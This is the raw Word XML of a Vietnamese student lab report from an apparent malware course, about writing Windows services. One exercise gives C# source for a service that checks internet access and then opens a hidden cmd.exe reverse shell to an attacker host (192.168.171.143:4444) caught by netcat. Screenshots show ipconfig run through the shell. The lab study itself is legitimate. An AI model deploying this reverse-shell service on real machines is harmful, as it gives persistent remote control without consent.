    <w:p w14:paraId="13C78C00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952A07B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E38FA3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0A2AD8" w14:textId="77777777" w:rsidR="005066F5" w:rsidRDefault="005066F5" w:rsidP="005066F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386F69E" w14:textId="77777777" w:rsidR="00721C46" w:rsidRDefault="005066F5" w:rsidP="009C1D4E"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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D458B" w14:textId="77777777" w:rsidR="00A3220B" w:rsidRDefault="00721C46" w:rsidP="008F3C79">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00A3220B" w:rsidRPr="00A3220B">
        <w:lastRenderedPageBreak/>
        <w:t>Cài đặt Windows service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572418F7" w14:textId="77777777" w:rsidR="000D58BB" w:rsidRDefault="000D58BB" w:rsidP="00A3220B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000D58BB">
        <w:t>cd C:\Windows\Microsoft.NET\Framework\v4.0.30319</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28617435" w14:textId="77777777" w:rsidR="008C50DD" w:rsidRDefault="008C50DD" w:rsidP="00A3220B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412F70BE" w14:textId="47E7F2FB" w:rsidR="009C1D4E" w:rsidRDefault="008C50DD" w:rsidP="00A3220B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008C50DD">
        <w:t>InstallUtil.exe E:\NT230-CoCheMaDoc\ThucHanh\Lab2\Lab2_Bai2\Lab2_Bai2\bin\Debug\Lab2_Bai2.exe</w:t>
      </w:r>
      <w:r w:rsidR="008F3C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6773C59D" w14:textId="59C8C0AC" w:rsidR="008F3C79" w:rsidRDefault="008F3C79" w:rsidP="00721C46">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00026C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05947ED3" wp14:editId="035B08D9">
            <wp:extent cx="6115050" cy="258000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C98" w14:textId="77777777" w:rsidR="008C50DD" w:rsidRDefault="008C50DD" w:rsidP="00721C46">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A754D10" w14:textId="4D8D35BB" w:rsidR="008C50DD" w:rsidRDefault="004A3657" w:rsidP="00721C46">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A3657">
        <w:t>Kiểm tra trạng thái của Windows Service</w:t>
      </w:r>
      <w:r>
        <w:t>, ProcessStatus service đã chạy thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C89DA45" w14:textId="3D400290" w:rsidR="009C1D4E" w:rsidRDefault="009C1D4E" w:rsidP="004977A9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BAF1C29" wp14:editId="31CABB31">
            <wp:extent cx="5745858" cy="1371368"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:docPr id="33" name="Picture 33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table&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22"/>
                    <a:srcRect r="7581" b="60787"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5788490" cy="138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84CF" w14:textId="7561D203" w:rsidR="00026C29" w:rsidRDefault="005E56CE" w:rsidP="00CE3C8D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="005E56CE">
        <w:t xml:space="preserve">Kiểm tra output của </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ProcessStatus service trong file log đã </w:t>
      </w:r>
      <w:r w:rsidR="00AB463F">
        <w:t>quy địn</w:t>
      </w:r>
      <w:r w:rsidR="00CE3C8D">
        <w:t>h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12074B39" w14:textId="07C76540" w:rsidR="00026C29" w:rsidRDefault="00CE3C8D" w:rsidP="001D3644">
      <w:r>
        <w:t>Service sẽ dừng chương trình khi không nằm trong lịch biểu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506094C1" w14:textId="483DA762" w:rsidR="00CB5867" w:rsidRDefault="00CB5867" w:rsidP="001D3644">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB5867">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004B2742" wp14:editId="58C54850">
            <wp:extent cx="4097847" cy="239998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912" cy="2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032D" w14:textId="2F3D025C" w:rsidR="00CB5867" w:rsidRDefault="001D3644" w:rsidP="009C1D4E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Chương trình Paint được </w:t>
      </w:r>
      <w:r w:rsidR="000E164D">
        <w:t>khởi động đúng theo lịch biểu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FE2AF" w14:textId="011A8511" w:rsidR="00B72445" w:rsidRDefault="00B72445" w:rsidP="001D3644">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B72445">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="716F8F13" wp14:editId="0BC51722">
            <wp:extent cx="4157781" cy="11139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618" cy="111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12D1" w14:textId="77777777" w:rsidR="007B1A3C" w:rsidRPr="009C1D4E" w:rsidRDefault="007B1A3C" w:rsidP="001D3644">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46412060" w14:textId="77F2F8B1" w:rsidR="00BA539D" w:rsidRDefault="008A3DB3" w:rsidP="001320DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bài thực hành 3: </w:t>
      </w:r>
      <w:r w:rsidR="001320DE">
        <w:t>Viết một Windows service có nhiệm vụ kiểm tra kết nối internet của máy hiện tại (HTTP) và tạo reverse shell đ</w:t>
      </w:r>
      <w:r w:rsidR="001320DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ơ</w:t>
      </w:r>
      <w:r w:rsidR="001320DE">
        <w:t>n giản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA6BBB0" w14:textId="497221AD" w:rsidR="00BA539D" w:rsidRDefault="004E33E4" w:rsidP="004E33E4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trong “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13926">
        <w:t xml:space="preserve">Command Prompt” </w:t>
      </w:r>
      <w:r>
        <w:t>gõ lệnh sau để cài đặt service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4D03A" w14:textId="333D7E38" w:rsidR="003050AA" w:rsidRDefault="00EB06F2" w:rsidP="003050AA">
      <w:r w:rsidRPr="00EB06F2">
        <w:t>cd C:\Windows\Microsoft.NET\Framework\v4.0.30319</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2289B5" w14:textId="77777777" w:rsidR="00EB06F2" w:rsidRDefault="00EB06F2" w:rsidP="003050AA"/>
    <w:p w14:paraId="6DFF67C8" w14:textId="1E69750D" w:rsidR="00114082" w:rsidRDefault="00114082" w:rsidP="003050AA">
      <w:r w:rsidRPr="00114082">
        <w:t>InstallUtil.exe E:\NT230-CoCheMaDoc\ThucHanh\Lab2\Lab2_Bai3\Lab2_Bai3\bin\Debug\Lab2_Bai3.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894FA85" w14:textId="77777777" w:rsidR="00BC2B09" w:rsidRDefault="00BC2B09" w:rsidP="003050AA"/>
    <w:p w14:paraId="3F286DF1" w14:textId="02296936" w:rsidR="000E59E8" w:rsidRDefault="000E59E8" w:rsidP="003050AA">
      <w:r>
        <w:tab/>
        <w:t>Service đã được cài đặt thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41469162" w14:textId="38CAFC3E" w:rsidR="00EB06F2" w:rsidRDefault="00BC2B09" w:rsidP="003050AA">
      <w:r w:rsidRPr="00BC2B09">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3B95D6" wp14:editId="5ABAE4FF">
            <wp:extent cx="6115050" cy="1254760"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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E794" w14:textId="16401F7B" w:rsidR="00EB06F2" w:rsidRDefault="00EB06F2" w:rsidP="003050AA">
      <w:r>
        <w:tab/>
        <w:t>Đặt tên hiển thị cho service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B21BAC" w14:textId="73B3F79D" w:rsidR="00EB06F2" w:rsidRDefault="00762D16" w:rsidP="003050AA">
      <w:r w:rsidRPr="00762D16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2F41A3" wp14:editId="30F582C0">
            <wp:extent cx="6115050" cy="22726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51DF" w14:textId="77777777" w:rsidR="00762D16" w:rsidRDefault="00762D16" w:rsidP="003050AA"/>
    <w:p w14:paraId="02732BC8" w14:textId="77777777" w:rsidR="002274C1" w:rsidRDefault="002274C1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78046353" w14:textId="5A296E23" w:rsidR="00762D16" w:rsidRDefault="009226FF" w:rsidP="003050AA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Source code chính, file name </w:t>
      </w:r>
      <w:r w:rsidRPr="00721C46">
        <w:t>Service1.cs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B732170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2AD677AB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Diagnostics;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9948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6A836B0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ServiceProcess;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE255E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Text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC5813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Timers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B8AF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Net.Http;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F4387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.Net.Sockets;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E806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19A12B57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Lab2_Bai3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5708715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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1BE92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kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Service1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: ServiceBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28D34F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B3F69A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Timer timer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Timer();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name space(using System.Timers;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5BB8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kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Service1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB743C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AF927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4591C38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07010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1BBEAA4E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OnStart(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] args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98407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EEC03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Service is started at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1D500E6A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timer.Elapsed +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ElapsedEventHandler(OnElapsedTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345C0AA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timer.Interval = 60000;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number in miliseconds 60s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD1086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timer.Enabled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186FCB8F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E0EF7D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37504D47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OnStop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB15F7B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A8BE7D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Service is stopped at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05A07BD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BC4E1B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6B0D61EF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OnElapsedTime(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ource, ElapsedEventArgs e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B72FF0A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AF0E2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Service is recall at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27BEE12F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CheckInternetConnection();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D19AF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320BB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6EF7F7C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WriteToFile(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Message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E91250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70677F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path = AppDomain.CurrentDomain.BaseDirectory +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\\Logs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1C3F4436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!Directory.Exists(path))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422893A0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9B429F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Directory.CreateDirectory(path);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA64C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B84EA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filepath = AppDomain.CurrentDomain.BaseDirectory +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\\Logs\\ServiceLog_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5AD3C8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DateTime.Now.Date.ToShortDateString().Replac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'/'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'_'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) +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.txt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51F89A5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!File.Exists(filepath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49456FB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DAB7B7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Create a file to write to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC695D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StreamWriter sw = File.CreateText(filepath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1970037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941F7D2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    sw.WriteLine(Message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD1C56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C5028F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FFF06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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB69210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D0E1FD7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StreamWriter sw = File.AppendText(filepath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E86582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B8ADD0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sw.WriteLine(Message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D52B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66B482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BB6B1D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090FCD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4FB00443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Hàm kiểm tra kết nối internet của máy hiện tại (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0618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CheckInternetConnection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CAFE37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877353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url =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http://www.google.com/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76600DD7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Khởi tạo http client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFF760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HttpClient clientHttp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HttpClient();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC20AE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y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228D80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3F50A9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Gửi request Get HTTP tới google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA33E16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HttpResponseMessage response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clientHttp.GetAsync(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53918A90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Internet Access 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117D957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19DC10A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nếu có internet sẽ thực hiện reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77E4B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Create reverse shell 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548EC2C2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ReverseShell();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D26ABE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559B7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</w:p>
    <w:p w14:paraId="013A1706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C91FF26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Ghi log nếu không có internet tức không thể kết nối tới www.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F6109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WriteToFile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No Internet Access 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DateTime.Now);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7A0FA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2175B8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51F398A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39EF2166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treamWriter sWriter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E11DB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Hàm tạo reverse shell với nạn nhân là máy hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E099D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ReverseShell()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03A9D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97AD32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* Khai báo */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DC15F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Kết nối tới máy attacker IP 192.168.171.143 đang lắng nghe trên port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614313B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TcpClient client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TcpClient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192.168.171.143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, 4444);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558712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Stream stream = client.GetStream();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8DF6D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StreamReader sReader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treamReader(stream);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A0034F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sWriter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treamWriter(stream);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FABB5B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StringBuilder strInput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tringBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966A99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0284A840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Tạo process cmd.exe và khởi tạo các Property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637610A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 process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Process();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592828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StartInfo.FileName =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cmd.exe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60A6EB0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StartInfo.CreateNoWindow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7E93784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StartInfo.UseShellExecute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7A795A7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StartInfo.RedirectStandardOutput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1C903CA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StartInfo.RedirectStandardInput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6473C023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StartInfo.RedirectStandardError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479EE70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OutputDataReceived +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DataReceivedEventHandler(CmdOutputDataHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611584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52753F43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Thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7708DD8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Start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A269AD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process.BeginOutputReadLine();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260F296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EB46BED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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D2136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91004B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strInput.Append(sReader.ReadLine());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569189C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process.StandardInput.WriteLine(strInput);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F014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strInput.Remove(0, strInput.Length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0581B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7100EBCE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634289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39FC4F9F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Hàm hiển thị output của cmd.exe lên console của attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87560A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CmdOutputDataHandler(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endingProcess, DataReceivedEventArgs outLine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC77DB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8EC53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StringBuilder strOutput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tringBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D304205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7F61836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!String.IsNullOrEmpty(outLine.Data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFAA1C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C1CC194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strOutput.Append(outLine.Data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B41C0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sWriter.WriteLine(strOutput);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A564DAC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sWriter.Flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEEA10B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A4E981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9ED0C8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60BC571B" w14:textId="77777777" w:rsidR="007355D4" w:rsidRDefault="007355D4" w:rsidP="007355D4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52121BA" w14:textId="5332B226" w:rsidR="002274C1" w:rsidRPr="00D03335" w:rsidRDefault="007355D4" w:rsidP="00D0333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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058E4D5" w14:textId="06335914" w:rsidR="002274C1" w:rsidRDefault="003C76A1" w:rsidP="003050AA">
      <w:r>
        <w:t xml:space="preserve">Công </w:t>
      </w:r>
      <w:r w:rsidR="00C528CE">
        <w:t xml:space="preserve">việc 1: kiểm tra kết nối internet. </w:t>
      </w:r>
      <w:r w:rsidR="00045D77">
        <w:t>Ở phần này, em thiết lập mỗi 5s gọi dịch vụ</w:t>
      </w:r>
      <w:r w:rsidR="00D03335">
        <w:t xml:space="preserve">, phần source code chưa </w:t>
      </w:r>
      <w:r w:rsidR="00C93172">
        <w:t>thực hiện hàm reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A37E1" w14:textId="39ACE68E" w:rsidR="00045D77" w:rsidRPr="003050AA" w:rsidRDefault="00045D77" w:rsidP="003050AA">
      <w:r>
        <w:tab/>
        <w:t>Service hoạt động và ghi log Internet Access khi máy tính có kết nối internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D051AD" w14:textId="2A68223A" w:rsidR="00FE0A6C" w:rsidRDefault="00F146CE" w:rsidP="00CB1540">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC35924" wp14:editId="1EFBB53B">
            <wp:extent cx="4160186" cy="2340159"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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990" cy="23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EA6" w14:textId="5C699867" w:rsidR="00045D77" w:rsidRDefault="00045D77" w:rsidP="00FE0A6C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Service ghi log No </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Internet Access khi máy tính </w:t>
      </w:r>
      <w:r>
        <w:t>đã tắt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kết nối internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA3C30" w14:textId="5C7EC8D2" w:rsidR="00C40F86" w:rsidRPr="00FE0A6C" w:rsidRDefault="00DC5D54" w:rsidP="00CB1540">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EB084B" wp14:editId="0B9E4466">
            <wp:extent cx="4151231" cy="2335121"/>
            <wp:effectExtent l="0" t="0" r="190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5150" cy="23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B19" w14:textId="0717FF24" w:rsidR="00BA539D" w:rsidRDefault="00BA539D" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B19DFDA" w14:textId="567AC6B7" w:rsidR="0067582A" w:rsidRDefault="0067582A" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Công việc 2: tạo reverse shell đơn giản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C61E8E" w14:textId="5C10A7FB" w:rsidR="0067582A" w:rsidRDefault="0067582A" w:rsidP="000E0EBF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Máy </w:t>
      </w:r>
      <w:r w:rsidR="003363BE">
        <w:t>nạn nhân: Window 10 (máy hiện tại)</w:t>
      </w:r>
      <w:r w:rsidR="00550B25">
        <w:t>, IP 192.168.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1A8BB" w14:textId="5EDEAE5D" w:rsidR="003363BE" w:rsidRDefault="00CB1540" w:rsidP="000E0EBF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB1540">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD403E6" wp14:editId="023BCF5C">
            <wp:extent cx="4282713" cy="4841290"/>
            <wp:effectExtent l="0" t="0" r="381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8105" cy="48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F2FE" w14:textId="2F4D70D4" w:rsidR="000E0EBF" w:rsidRDefault="000E0EBF" w:rsidP="000E0EBF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Máy attacker: kali linux</w:t>
      </w:r>
      <w:r w:rsidR="00550B25">
        <w:t xml:space="preserve">, IP 192.168.171.143. Dùng công cụ netcat thực hiện lắng nghe trên </w:t>
      </w:r>
      <w:r w:rsidR="00CB2607">
        <w:t>port 4444, đợi nạn nhân kết nối vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D43D62B" w14:textId="5B40401F" w:rsidR="00DE28F2" w:rsidRDefault="00DE28F2" w:rsidP="00CB2607">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE28F2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE8D4FB" wp14:editId="67DDFFB1">
            <wp:extent cx="4892336" cy="2239399"/>
            <wp:effectExtent l="0" t="0" r="3810" b="889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0511" cy="22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3FDA" w14:textId="77777777" w:rsidR="00CB2607" w:rsidRDefault="00CB2607">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298F540" w14:textId="77777777" w:rsidR="00D03335" w:rsidRDefault="00CB2607" w:rsidP="00CB2607">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phần này</w:t>
      </w:r>
      <w:r w:rsidR="00BC04E4">
        <w:t>, em thiết lập gọi dịch vụ sau mỗi 60s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFFEE2" w14:textId="3503645F" w:rsidR="00DE28F2" w:rsidRDefault="00D03335" w:rsidP="00D03335">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032081D">
        <w:t>Sau khi kiểm tra có kết nối internet</w:t>
      </w:r>
      <w:r w:rsidR="008A1F16">
        <w:t>, service chạy hàm reverse shell kết nối tới máy attac</w:t>
      </w:r>
      <w:r w:rsidR="008D1A07">
        <w:t>ker. Lúc này màn hình attacker đã hiển thị nhận được kết nối và chạy chương trình cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490AEE27" w14:textId="4841CD70" w:rsidR="00785F96" w:rsidRDefault="00514C85" w:rsidP="00CE64A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A5F187E" wp14:editId="6FC44EC0">
            <wp:extent cx="6115050" cy="3439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23C" w:rsidRPr="008D023C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405296A3" w14:textId="77777777" w:rsidR="003620C3" w:rsidRDefault="003620C3" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36176BD7" w14:textId="17D88492" w:rsidR="008D1A07" w:rsidRDefault="008D1A07" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Thử với lệnh ipconfig.</w:t>
      </w:r>
      <w:r w:rsidR="00457F05">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Đã thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D867F" w14:textId="39CF8F73" w:rsidR="003620C3" w:rsidRDefault="003620C3" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ABF138E" wp14:editId="746E689E">
            <wp:extent cx="6115050" cy="34397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9C9A" w14:textId="77777777" w:rsidR="003620C3" w:rsidRDefault="003620C3" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064F2715" w14:textId="332A6B06" w:rsidR="002D0E59" w:rsidRDefault="004F64FD" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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2" w:name="OLE_LINK29"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK30"/>
      <w:r>
        <w:t>xây dựng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3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33"/>
      <w:footerReference w:type="default" r:id="rId34"/>
      <w:headerReference w:type="first" r:id="rId3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0585" w14:textId="77777777" w:rsidR="00EC7F89" w:rsidRDefault="00EC7F89" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F13D55B" w14:textId="77777777" w:rsidR="00EC7F89" w:rsidRDefault="00EC7F8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B170" w14:textId="77777777" w:rsidR="00EC7F89" w:rsidRDefault="00EC7F89" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F0FBA8B" w14:textId="77777777" w:rsidR="00EC7F89" w:rsidRDefault="00EC7F89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E6D6FE3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B71474" w:rsidRPr="00B71474">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>Windows Service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B71474">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF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14895"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CAF6D12A"/>
    <w:lvl w:ilvl="0" w:tplc="099CE6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6"/>
  </w:num>
